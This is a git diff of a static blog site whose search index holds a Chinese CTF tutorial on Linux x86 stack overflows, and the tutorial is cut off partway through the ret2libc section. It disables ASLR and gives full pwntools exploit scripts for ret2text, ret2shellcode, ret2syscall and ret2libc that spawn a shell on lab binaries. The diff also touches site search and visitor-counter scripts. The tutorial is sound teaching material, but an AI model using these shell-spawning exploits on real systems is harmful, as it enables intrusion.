+                    hitCount = indexOfTitle.length + indexOfContent.length;
+                  }
+                }
+
+                // show search results
+
+                if (isMatch) {
+                  // sort index by position of keyword
+
+                  [indexOfTitle, indexOfContent].forEach(function (index) {
+                    index.sort(function (itemLeft, itemRight) {
+                      if (itemRight.position !== itemLeft.position) {
+                        return itemRight.position - itemLeft.position;
+                      } else {
+                        return itemLeft.word.length - itemRight.word.length;
+                      }
+                    });
+                  });
+
+                  // merge hits into slices
+
+                  function mergeIntoSlice(text, start, end, index) {
+                    var item = index[index.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    var hits = [];
+                    var searchTextCountInSlice = 0;
+                    while (position + word.length <= end && index.length != 0) {
+                      if (word === searchText) {
+                        searchTextCountInSlice++;
+                      }
+                      hits.push({position: position, length: word.length});
+                      var wordEnd = position + word.length;
+
+                      // move to next position of hit
+
+                      index.pop();
+                      while (index.length != 0) {
+                        item = index[index.length - 1];
+                        position = item.position;
+                        word = item.word;
+                        if (wordEnd > position) {
+                          index.pop();
+                        } else {
+                          break;
+                        }
+                      }
+                    }
+                    searchTextCount += searchTextCountInSlice;
+                    return {
+                      hits: hits,
+                      start: start,
+                      end: end,
+                      searchTextCount: searchTextCountInSlice
+                    };
+                  }
+
+                  var slicesOfTitle = [];
+                  if (indexOfTitle.length != 0) {
+                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
+                  }
+
+                  var slicesOfContent = [];
+                  while (indexOfContent.length != 0) {
+                    var item = indexOfContent[indexOfContent.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    // cut out 100 characters
+                    var start = position - 20;
+                    var end = position + 80;
+                    if(start < 0){
+                      start = 0;
+                    }
+                    if (end < position + word.length) {
+                      end = position + word.length;
+                    }
+                    if(end > content.length){
+                      end = content.length;
+                    }
+                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
+                  }
+
+                  // sort slices in content by search text's count and hits' count
+
+                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
+                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
+                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
+                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
+                      return sliceRight.hits.length - sliceLeft.hits.length;
+                    } else {
+                      return sliceLeft.start - sliceRight.start;
+                    }
+                  });
+
+                  // select top N slices in content
+
+                  var upperBound = parseInt('1');
+                  if (upperBound >= 0) {
+                    slicesOfContent = slicesOfContent.slice(0, upperBound);
+                  }
+
+                  // highlight title and content
+
+                  function highlightKeyword(text, slice) {
+                    var result = '';
+                    var prevEnd = slice.start;
+                    slice.hits.forEach(function (hit) {
+                      result += text.substring(prevEnd, hit.position);
+                      var end = hit.position + hit.length;
+                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
+                      prevEnd = end;
+                    });
+                    result += text.substring(prevEnd, slice.end);
+                    return result;
+                  }
+
+                  var resultItem = '';
+
+                  if (slicesOfTitle.length != 0) {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
+                  } else {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
+                  }
+
+                  slicesOfContent.forEach(function (slice) {
+                    resultItem += "<a href='" + articleUrl + "'>" +
+                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
+                      "...</p>" + "</a>";
+                  });
+
+                  resultItem += "</li>";
+                  resultItems.push({
+                    item: resultItem,
+                    searchTextCount: searchTextCount,
+                    hitCount: hitCount,
+                    id: resultItems.length
+                  });
+                }
+              })
+            };
+            if (keywords.length === 1 && keywords[0] === "") {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
+            } else if (resultItems.length === 0) {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
+            } else {
+              resultItems.sort(function (resultLeft, resultRight) {
+                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
+                  return resultRight.searchTextCount - resultLeft.searchTextCount;
+                } else if (resultLeft.hitCount !== resultRight.hitCount) {
+                  return resultRight.hitCount - resultLeft.hitCount;
+                } else {
+                  return resultRight.id - resultLeft.id;
+                }
+              });
+              var searchResultList = '<ul class=\"search-result-list\">';
+              resultItems.forEach(function (result) {
+                searchResultList += result.item;
+              })
+              searchResultList += "</ul>";
+              resultContent.innerHTML = searchResultList;
+            }
+          }
+
+          if ('auto' === 'auto') {
+            input.addEventListener('input', inputEventFunction);
+          } else {
+            $('.search-icon').click(inputEventFunction);
+            input.addEventListener('keypress', function (event) {
+              if (event.keyCode === 13) {
+                inputEventFunction();
+              }
+            });
+          }
+
+          // remove loading animation
+          $(".local-search-pop-overlay").remove();
+          $('body').css('overflow', '');
+
+          proceedsearch();
+        }
+      });
+    }
+
+    // handle and trigger popup window;
+    $('.popup-trigger').click(function(e) {
+      e.stopPropagation();
+      if (isfetched === false) {
+        searchFunc(path, 'local-search-input', 'local-search-result');
+      } else {
+        proceedsearch();
+      };
+    });
+
+    $('.popup-btn-close').click(onPopupClose);
+    $('.popup').click(function(e){
+      e.stopPropagation();
+    });
+    $(document).on('keyup', function (event) {
+      var shouldDismissSearchPopup = event.which === 27 &&
+        $('.search-popup').is(':visible');
+      if (shouldDismissSearchPopup) {
+        onPopupClose();
+      }
+    });
+  </script>
+
+
+
+
+
+  
+
+  
+  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
+  <script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
+  <script>
+    function showTime(Counter) {
+      var query = new AV.Query(Counter);
+      var entries = [];
+      var $visitors = $(".leancloud_visitors");
+
+      $visitors.each(function () {
+        entries.push( $(this).attr("id").trim() );
+      });
+
+      query.containedIn('url', entries);
+      query.find()
+        .done(function (results) {
+          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
+
+          if (results.length === 0) {
+            $visitors.find(COUNT_CONTAINER_REF).text(0);
+            return;
+          }
+
+          for (var i = 0; i < results.length; i++) {
+            var item = results[i];
+            var url = item.get('url');
+            var time = item.get('time');
+            var element = document.getElementById(url);
+
+            $(element).find(COUNT_CONTAINER_REF).text(time);
+          }
+          for(var i = 0; i < entries.length; i++) {
+            var url = entries[i];
+            var element = document.getElementById(url);
+            var countSpan = $(element).find(COUNT_CONTAINER_REF);
+            if( countSpan.text() == '') {
+              countSpan.text(0);
+            }
+          }
+        })
+        .fail(function (object, error) {
+          console.log("Error: " + error.code + " " + error.message);
+        });
+    }
+
+    function addCount(Counter) {
+      var $visitors = $(".leancloud_visitors");
+      var url = $visitors.attr('id').trim();
+      var title = $visitors.attr('data-flag-title').trim();
+      var query = new AV.Query(Counter);
+
+      query.equalTo("url", url);
+      query.find({
+        success: function(results) {
+          if (results.length > 0) {
+            var counter = results[0];
+            counter.fetchWhenSave(true);
+            counter.increment("time");
+            counter.save(null, {
+              success: function(counter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(counter.get('time'));
+              },
+              error: function(counter, error) {
+                console.log('Failed to save Visitor num, with error message: ' + error.message);
+              }
+            });
+          } else {
+            var newcounter = new Counter();
+            /* Set ACL */
+            var acl = new AV.ACL();
+            acl.setPublicReadAccess(true);
+            acl.setPublicWriteAccess(true);
+            newcounter.setACL(acl);
+            /* End Set ACL */
+            newcounter.set("title", title);
+            newcounter.set("url", url);
+            newcounter.set("time", 1);
+            newcounter.save(null, {
+              success: function(newcounter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
+              },
+              error: function(newcounter, error) {
+                console.log('Failed to create');
+              }
+            });
+          }
+        },
+        error: function(error) {
+          console.log('Error:' + error.code + " " + error.message);
+        }
+      });
+    }
+
+    $(function() {
+      var Counter = AV.Object.extend("Counter");
+      if ($('.leancloud_visitors').length == 1) {
+        addCount(Counter);
+      } else if ($('.post-title-link').length > 1) {
+        showTime(Counter);
+      }
+    });
+  </script>
+
+
+
+  
+
+  
+<script>
+(function(){
+    var bp = document.createElement('script');
+    var curProtocol = window.location.protocol.split(':')[0];
+    if (curProtocol === 'https') {
+        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
+    }
+    else {
+        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
+    }
+    var s = document.getElementsByTagName("script")[0];
+    s.parentNode.insertBefore(bp, s);
+})();
+</script>
+
+
+  
+  
+
+  
+
+  
+
+  
+
+</body>
+</html>
diff --git a/categories/index.html b/categories/index.html
index 5f37db36..9cd86ddb 100644
--- a/categories/index.html
+++ b/categories/index.html
@@ -324,7 +324,7 @@
                 目前共计 7 个分类
             </div>
             <div class="category-all">
-              <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/IOT/">IOT</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Pwn二进制漏洞/">Pwn二进制漏洞</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/二进制/">二进制</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/加密解密/">加密解密</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/杂七杂八/">杂七杂八</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/顶会论文/">顶会论文</a><span class="category-list-count">3</span></li></ul>
+              <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/IOT/">IOT</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Pwn/">Pwn</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/二进制/">二进制</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/加密解密/">加密解密</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/杂七杂八/">杂七杂八</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/顶会论文/">顶会论文</a><span class="category-list-count">3</span></li></ul>
             </div>
           </div>
         
diff --git a/css/main.css b/css/main.css
index f0f70215..5a450d42 100644
--- a/css/main.css
+++ b/css/main.css
@@ -1943,7 +1943,7 @@ pre .javascript .function {
   width: 4px;
   height: 4px;
   border-radius: 50%;
-  background: #048809;
+  background: #b85483;
 }
 .links-of-blogroll {
   font-size: 13px;
diff --git a/index.html b/index.html
index 7b4ec66c..0b062b10 100644
--- a/index.html
+++ b/index.html
@@ -929,8 +929,8 @@ http:
               
               
                 <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
-                  <a href="/categories/Pwn二进制漏洞/" itemprop="url" rel="index">
-                    <span itemprop="name">Pwn二进制漏洞</span>
+                  <a href="/categories/Pwn/" itemprop="url" rel="index">
+                    <span itemprop="name">Pwn</span>
                   </a>
                 </span>
 
@@ -1118,8 +1118,8 @@ CTF-WIKI：https://ctf-wiki.github.io/ct
               
               
                 <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
-                  <a href="/categories/Pwn二进制漏洞/" itemprop="url" rel="index">
-                    <span itemprop="name">Pwn二进制漏洞</span>
+                  <a href="/categories/Pwn/" itemprop="url" rel="index">
+                    <span itemprop="name">Pwn</span>
                   </a>
                 </span>
 
diff --git a/search.xml b/search.xml
index 91661ade..12b4ff0a 100644
--- a/search.xml
+++ b/search.xml
@@ -42,7 +42,7 @@
     <url>%2F2019%2F07%2F16%2Flinux-pwn-32%2F</url>
     <content type="text"><![CDATA[之前介绍了Windows x86平台下栈溢出漏洞的开放与利用，鉴于CTF基本都是Linux，还有实际开发环境，很多智能设备的系统都是基于Linux，所以从很现实的需求出发，一定要学习学习Linux下漏洞的分析。 ref： CTF-WIKI：https://ctf-wiki.github.io/ctf-wiki/pwn/readme-zh/蒸米大佬的一步一步学rop http://www.anquan.us/static/drops/tips-6597.htmlhttps://bbs.pediy.com/thread-221734.htm 工具： objdump、ldd、ROPgadget、readelf、https://ctf-wiki.github.io/ctf-tools/https://github.com/ctf-wiki/ctf-challenges 0x00 Control Flow hijack和Windows一样，栈溢出的根本原因在于当前计算机的体系结构没有区分代码段和数据段，因此我们可以通过修改数据段的内容（返回地址），改变程序的执行流程，从而达到程序流劫持的效果。改变计算机体系来规避漏洞目前是不可能的，防御者为了应对这种攻击，提出了各种增大攻击难度的措施（没有绝对安全的系统），最常见的有：DEP堆栈不可执行、ASLR内存地址随机化、GS/Canary栈保护等。我们从最简单的入手，不开启任何防护，先了解栈溢出的基本操作，然后逐步增加防御措施。 寻找危险函数这里有一个漏洞程序12345678910111213#include &lt;stdio.h&gt;#include &lt;string.h&gt;void success() &#123; puts(&quot;You Hava already controlled it.&quot;); &#125;void vulnerable() &#123; char s[12]; gets(s); puts(s); return;&#125;int main(int argc, char **argv) &#123; vulnerable(); return 0;&#125; 当我们看到gets时就应该知道如何入手了，这是一个非常危险的函数，无条件的接受任意大的字符串。历史上，莫里斯蠕虫第一种蠕虫病毒就利用了 gets 这个危险函数实现了栈溢出。先进行编译，关闭防御措施：12345678$ gcc -m32 -no-pie -fno-stack-protector -z execstack stack1.c -o stack1stack1.c: In function ‘vulnerable’:stack1.c:6:3: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration] gets(s); ^~~~ fgets/tmp/ccUuPrSy.o: In function `vulnerable&apos;:stack1.c:(.text+0x45): warning: the `gets&apos; function is dangerous and should not be used. 编译器都会提示你，gets不要再用了。-fno-stack-protector 和-z execstack分便会关掉栈保护的DEP.-no-PIE关闭 PIE（Position Independent Executable），避免加载基址被打乱。接下来关闭整个linux系统的ASLR保护：12345$ suPassword:root@ubuntu:/home/han/ck/pwn/linux/stack_demo# echo 0 &gt; /proc/sys/kernel/randomize_va_spaceroot@ubuntu:/home/han/ck/pwn/linux/stack_demo# exitexit 计算溢出点的位置什么是溢出点的位置：从缓冲区到覆盖返回地址所需要的字节数我们同样也可以使用工具pattern_create和pattern_offset来计算，这里我们先手动计算：把stack1拖入IDA进行反汇编分析：1234567int vulnerable()&#123; char s; // [sp+4h] [bp-14h]@1 gets(&amp;s); return puts(&amp;s);&#125; 在伪代码窗口，我们可看到变量s和bp的距离为14h，再加上old bp的4字节，到ret的距离就是18h。123456789101112 +-----------------+ | retaddr | +-----------------+ | saved ebp | ebp---&gt;+-----------------+ | | | | | | | | | | | |s,ebp-0x14--&gt;+-----------------+ 劫持ret的地址这里我们想让程序跳转到success()，从IDA直接可以获取0x08048456123456789101112131415161718192021.text:08048456 success proc near.text:08048456.text:08048456 var_4 = dword ptr -4.text:08048456.text:08048456 push ebp.text:08048457 mov ebp, esp.text:08048459 push ebx.text:0804845A sub esp, 4.text:0804845D call __x86_get_pc_thunk_ax.text:08048462 add eax, 1B9Eh.text:08048467 sub esp, 0Ch.text:0804846A lea edx, (aYouHavaAlready - 804A000h)[eax] ; &quot;You Hava already controlled it.&quot;.text:08048470 push edx ; s.text:08048471 mov ebx, eax.text:08048473 call _puts.text:08048478 add esp, 10h.text:0804847B nop.text:0804847C mov ebx, [ebp+var_4].text:0804847F leave.text:08048480 retn.text:08048480 success endp 那么如果我们构造的字符串为：10x18*&apos;a&apos;+success_addr 这样就会将retaddr覆盖巍峨哦success_addr,此时栈结构为：123456789101112 +-----------------+ | 0x0804843B | +-----------------+ | aaaa | ebp---&gt;+-----------------+ | | | | | | | | | | | |s,ebp-0x14--&gt;+-----------------+ pwn测试使用pwntools，怎么使用，以具体的exp来介绍，比如stack1的exp如下：1234567891011from pwn import *p = process(&apos;./stack1&apos;)ret_addr = 0x08048456offset = 0x18payload = &apos;A&apos; * offset + p32(ret_addr)print(ret_addr,p32(ret_addr))p.sendline(payload)p.interactive() 连接本地process(),远程remote() 数据处理p32、p64是打包（转换成二进制），u32、u64是解包 IO模块send(data) : 发送数据sendline(data) : 发送一行数据，相当于在末尾加\ninteractive() : 与shell交互 执行exp：12345678$ python stack1.py[+] Starting local process &apos;./stack1&apos;: pid 8328(134513750, &apos;V\x84\x04\x08&apos;)[*] Switching to interactive modeAAAAAAAAAAAAAAAAAAAAAAAAV\x84\x0You Hava already controlled it.[*] Got EOF while reading in interactive$ 0X01 ret2shellcode原理ret2shellcode，即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码，常见的功能主要是获取目标系统的 shell。一般来说，shellcode 需要我们自己填充。这其实是另外一种典型的利用方法，即此时我们需要自己去填充一些可执行的代码。 在栈溢出的基础上，要想执行 shellcode，需要对应的 binary 在运行时，shellcode 所在的区域具有可执行权限(NX disabled)。 检查保护情况1234567891011$ checksec ret2shellcode[*] &apos;/home/han/ck/pwn/linux/re2shellcode/ret2shellcode&apos; Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments$ cat /proc/sys/kernel/randomize_va_space0 可以看出源程序几乎没有开启任何保护，并且有可读，可写，可执行段。 查看危险函数123456789101112int __cdecl main(int argc, const char **argv, const char **envp)&#123; int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); puts(&quot;No system for you this time !!!&quot;); gets((char *)&amp;v4); strncpy(buf2, (const char *)&amp;v4, 0x64u); printf(&quot;bye bye ~&quot;); return 0;&#125; 可以看到，漏洞函数依然还是gets，不过这次还把v4复制到了buf2处。12.bss:0804A080 public buf2.bss:0804A080 ; char buf2[100] 通过sudo cat /proc/[pid]/maps查看,会发现buf2和stack都是rwx的。 计算溢出点可以看到该字符串是通过相对于 esp 的索引，所以我们需要进行调试，将断点下在 call gets处，查看 esp，ebp123456789101112131415161718192021222324252627282930313233343536[----------------------------------registers-----------------------------------]EAX: 0xffffc99c --&gt; 0xf7ffd000 --&gt; 0x26f34EBX: 0x0ECX: 0xf7fb2dc7 --&gt; 0xfb38900aEDX: 0xf7fb3890 --&gt; 0x0ESI: 0xf7fb2000 --&gt; 0x1d4d6cEDI: 0x0EBP: 0xffffca08 --&gt; 0x0ESP: 0xffffc980 --&gt; 0xffffc99c --&gt; 0xf7ffd000 --&gt; 0x26f34EIP: 0x8048593 (&lt;main+102&gt;: call 0x80483d0 &lt;gets@plt&gt;)EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)[-------------------------------------code-------------------------------------] 0x8048587 &lt;main+90&gt;: call 0x80483e0 &lt;puts@plt&gt; 0x804858c &lt;main+95&gt;: lea eax,[esp+0x1c] 0x8048590 &lt;main+99&gt;: mov DWORD PTR [esp],eax=&gt; 0x8048593 &lt;main+102&gt;: call 0x80483d0 &lt;gets@plt&gt; 0x8048598 &lt;main+107&gt;: mov DWORD PTR [esp+0x8],0x64 0x80485a0 &lt;main+115&gt;: lea eax,[esp+0x1c] 0x80485a4 &lt;main+119&gt;: mov DWORD PTR [esp+0x4],eax 0x80485a8 &lt;main+123&gt;: mov DWORD PTR [esp],0x804a080Guessed arguments:arg[0]: 0xffffc99c --&gt; 0xf7ffd000 --&gt; 0x26f34[------------------------------------stack-------------------------------------]0000| 0xffffc980 --&gt; 0xffffc99c --&gt; 0xf7ffd000 --&gt; 0x26f340004| 0xffffc984 --&gt; 0x00008| 0xffffc988 --&gt; 0x10012| 0xffffc98c --&gt; 0x00016| 0xffffc990 --&gt; 0x00020| 0xffffc994 --&gt; 0xc300000024| 0xffffc998 --&gt; 0x00028| 0xffffc99c --&gt; 0xf7ffd000 --&gt; 0x26f34[------------------------------------------------------------------------------]Legend: code, data, rodata, valueBreakpoint 1, 0x08048593 in main () at ret2shellcode.c:1414 ret2shellcode.c: No such file or directory. 可以看到 esp 为 0xffffc980，ebp 为0xffffca08，同时 v4 相对于 esp 的索引为 [esp+0x1c]，所以，v4 的地址为 0xffffc99c，所以 s 相对于 ebp 的偏移为 0x6C，所以相对于返回地址的偏移为 0x6c+4。 劫持ret的地址这次我们想要程序执行shellcode，那么我们可以把shellcode放在任何可执行的位置，比如buf2或栈上，位置的地址就是我们需要覆盖ret_addr的值 pwn测试控制程序执行bss段的shellcode12345678910111213from pwn import *p = process(&apos;./ret2shellcode&apos;)ret_addr = 0x0804A080offset = 0x6c + 4shellcode = asm(shellcraft.i386.linux.sh())payload = shellcode.ljust(offset,&apos;a&apos;) + p32(ret_addr)#payload = shellcode + &apos;a&apos;*(offset - len(shellcode)) + p32(ret_addr)p.sendline(payload)p.interactive() Shellcode生成器使用shellcraft可以生成对应的架构的shellcode代码，直接使用链式调用的方法就可以得到如32位linux：shellcraft.i386.linux.sh()shellcode.ljust(offset,’a’)在shellcode后面填充offset - len(shellcode)长度的字符‘a’ 汇编与反汇编使用asm来进行汇编，使用disasm进行反汇编指定cpu类型以及操作系统：asm(‘nop’, arch=’arm’，os = ‘linux’，endian = ‘little’，word_size = 32) 0x02 ret2text原理ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实，这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets)，这就是我们所要说的 ROP。 ROP不需要去执行栈中的shellcode，因此可以绕过DEP保护 检查保护1234567$ checksec ret2text[*] &apos;/home/han/ck/pwn/linux/ret2text/ret2text&apos; Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 开启了DEP，问题不大，因为执行的已有的代码 检查危险函数1234567891011int __cdecl main(int argc, const char **argv, const char **envp)&#123; int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(_bss_start, 0, 1, 0); puts("There is something amazing here, do you know anything?"); gets((char *)&amp;v4); printf("Maybe I will tell you next time !"); return 0;&#125; 同样还是gets函数 计算偏移和上一个一样，0x6c+4 寻找跳板在代码段发现调用 system(“/bin/sh”) 的代码，那么直接将ret覆盖为0804863A就能拿到shell1234567.text:0804862D call ___isoc99_scanf.text:08048632 mov eax, [ebp+input].text:08048635 cmp eax, [ebp+secretcode].text:08048638 jnz short locret_8048646.text:0804863A mov dword ptr [esp], offset command ; &quot;/bin/sh&quot;.text:08048641 call _system.text:08048646 测试123456789101112from pwn import *p = process(&apos;./ret2text&apos;)ret_add = 0x0804863Aoffset = 0x6c + 4payload = &apos;A&apos;*offset + p32(ret_add)print(p32(ret_add))p.sendline(payload)p.interactive() 0x03 ret2syscall原理ret2syscall，即控制程序执行系统调用，获取 shell。上一个可以在代码段找到system(‘/bin/sh’),如果没法找到的话，我们就得自己去构造系统调用简单地说，只要我们把对应获取 shell 的系统调用的参数放到对应的寄存器中，那么我们在执行 int 0x80 就可执行对应的系统调用。比如说这里我们利用如下系统调用来获取 shellexecve(&quot;/bin/sh&quot;,NULL,NULL)其中，该程序是 32 位，所以我们需要使得1234系统调用号，即 eax 应该为 0xb第一个参数，即 ebx 应该指向 /bin/sh 的地址，其实执行 sh 的地址也可以。第二个参数，即 ecx 应该为 0第三个参数，即 edx 应该为 0 获取跳板那么我们如何去控制这4个寄存器的值，我们现在修改的只有栈中的数据，这里就需要使用 gadgets。比如说，现在栈顶是 10，那么如果此时执行了 pop eax，那么现在 eax 的值就为 10。但是我们并不能期待有一段连续的代码可以同时控制对应的寄存器，所以我们需要一段一段控制，这也是我们在 gadgets 最后使用 ret 来再次控制程序执行流程的原因。具体寻找 gadgets 的方法，我们可以使用 ropgadgets 这个工具。首先，我们来寻找控制 eax 的 gadgets123456$ ROPgadget --binary ret2syscall --only &apos;pop|ret&apos;|grep eax0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret0x080bb196 : pop eax ; ret0x0807217a : pop eax ; ret 0x80e0x0804f704 : pop eax ; ret 30x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret 类似的，我们可以得到控制其它寄存器的 gadgets12345678910111213141516171819202122232425262728$ ROPgadget --binary ret2syscall --only &apos;pop|ret&apos;|grep ebx0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret0x080be23f : pop ebx ; pop edi ; ret0x0806eb69 : pop ebx ; pop edx ; ret0x08092258 : pop ebx ; pop esi ; pop ebp ; ret0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x100x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x140x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc0x0805ae81 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 40x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 80x08048913 : pop ebx ; pop esi ; pop edi ; ret0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 40x08049a94 : pop ebx ; pop esi ; ret0x080481c9 : pop ebx ; ret0x080d7d3c : pop ebx ; ret 0x6f90x08099c87 : pop ebx ; ret 80x0806eb91 : pop ecx ; pop ebx ; ret0x0806336b : pop edi ; pop esi ; pop ebx ; ret0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret0x0805c820 : pop esi ; pop ebx ; ret0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret0x0807b6ed : pop ss ; pop ebx ; ret 现在，我们就得到了可以控制4个寄存器的地址：0x080bb196 : pop eax ; ret0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret 另外，我们要向ebx写入’/bin/sh’，同时执行int 80所以要搜索，看看程序中有没有123456789$ ROPgadget --binary ret2syscall --only intGadgets information============================================================0x08049421 : int 0x800x080938fe : int 0xbb0x080869b5 : int 0xf60x0807b4d4 : int 0xfcUnique gadgets found: 4 1234$ ROPgadget --binary ret2syscall --string &apos;/bin/sh&apos;Strings information============================================================0x080be42c : /bin/sh 测试12345678910111213141516171819from pwn import *p = process('./ret2syscall')offset = 0x6c + 4pop_eax_ret = 0x080bb196pop_edx_ecx_ebx_ret = 0x0806eb90binsh = 0x080be408int_0x80 = 0x08049421payload = 'A'*offset + p32(pop_eax_ret) + p32(0xb) + p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(binsh) + p32(int_0x80)payload = flat('A'*offset , pop_eax_ret , 0xb , pop_edx_ecx_ebx_ret , 0 , 0 , binsh,int_0x80)print(payload)p.sendline(payload)p.interactive() flat()在pwntools中可以用flat()來构造rop，参数传递用list來传，list中的element为想串接的rop gadget地址，简单来说就是可以把：rop = p32(gadget1) + p32(gadget2) + p32(gadget3) ……变成这样表示：flat([gadget1,gadget2,gadget3,……]) 0x04 ret2libc原理我们知道程序调用了libc.so，并且libc.so里保存了大量可利用的函数，我们如果可以让程序执行system(“/bin/sh”)的话，也可以获取到shell。既然思路有了，那么接下来的问题就是如何得到system()这个函数的地址以及”/bin/sh”这个字符串的地址，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容) 1. 程序中有system和’/bin/sh’检查保护1234567$ checksec ret2libc1[*] &apos;/home/han/ck/pwn/linux/ret2libc/ret2libc1&apos; Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 确定漏洞位置12345678910int __cdecl main(int argc, const char **argv, const char **envp)&#123; int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(_bss_start, 0, 1, 0); puts("RET2LIBC &gt;_&lt;"); gets((char *)&amp;v4); return 0;&#125; 计算偏移寻找跳板 system_plt 123.plt:08048460 _system proc near ; CODE XREF: secure+44p.plt:08048460 jmp ds:off_804A018.plt:08048460 _system endp ‘binsh’ 1234$ ROPgadget --binary ret2libc1 --string &apos;/bin/sh&apos;Strings information============================================================0x08048744 : /bin/sh pwn测试12345678910111213from pwn import *p = process('./ret2libc1')offset =112binsh = 0x08048720system_plt = 0x08048460fake_ret = 'bbbb'payload = flat(['a'*offset,system_plt,fake_ret,binsh])p.sendline(payload)p.interactive() fake_ret是调用system之后的返回地址，binsh就是system的参数 2. 没有binsh需要我们自己来读取字符串，所以我们需要两个 gadgets，第一个控制程序读取字符串，使用gets将’/bin/sh’写入程序某个位置，第二个控制程序执行 system(“/bin/sh”)。 我们在.bss段发现了未利用的buf2，可以把binsh写入buf21234.bss:0804A080 public buf2.bss:0804A080 ; char buf2[100].bss:0804A080 buf2 db 64h dup(?).bss:0804A080 _bss ends 1234567891011121314from pwn import *p = process(&apos;./ret2libc2&apos;)gets_plt = 0x08048460pop_ebx = 0x0804843dsystem_plt = 0x08048490buf2_add = 0x804a080payload = flat([&apos;a&apos;*112,gets_plt,pop_ebx,buf2_add,system_plt,0xdeadbeef,buf2_add])p.sendline(payload)p.sendline(&apos;/bin/sh&apos;)p.interactive() buf2_add是gets的参数，pop_ebx将gets返回后的堆栈平衡，移交控制权给system 3. 两个都没有&amp;无ASLR程序中两个都没有，但是我们可以利用libc中的system和’/bin/sh’1234567$ checksec ret2libc3[*] &apos;/home/han/ck/pwn/linux/ret2libc/ret2libc3&apos; Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 